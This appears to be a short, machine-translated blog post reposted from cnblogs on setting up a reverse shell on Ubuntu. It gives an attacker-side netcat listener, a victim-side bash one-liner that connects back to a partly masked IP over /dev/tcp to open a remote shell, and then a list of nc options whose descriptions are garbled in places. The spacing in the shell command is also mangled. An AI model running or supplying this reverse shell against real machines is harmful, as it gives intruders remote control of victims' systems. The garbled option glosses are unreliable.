Ubuntu - reflecting shell nc

Attack:

  apt-get install netcat

 

  nc -lvvp 80

 

Victim machine:

 

/ bin / bash -i> & /dev/tcp/139.xxx.18.xx/80 0> & 1 




nc command added:

-g <Gateway>: Set the communication gateway router hops, provided up to 8;

-G <pointer number>: Set Source route point, a value which is a multiple of 4;

-h: online help;

-i <delay in seconds>: set the time interval in order to transfer the scanning information and communication ports;

-l: Use listening mode, monitoring the incoming data;

-n: ip address directly, without passing through the domain name server;

-o <output file>: specify the file name, the transmission of data to and from the word hexadecimal dump to save the file;

-p <communications port>: Set the communication port used by the local host;

-r: source port and destination port random selection;

-s <Source address>: Set the local host IP address of the packet sent;

-u: using UDP transport protocol;

-v: display process execution instruction;

-w <timeout seconds>: connection setup time to wait;

-z: 0 using an input / output mode, only the communication port during the scan.

 

Guess you like

Origin www.cnblogs.com/mafeng/p/11781171.html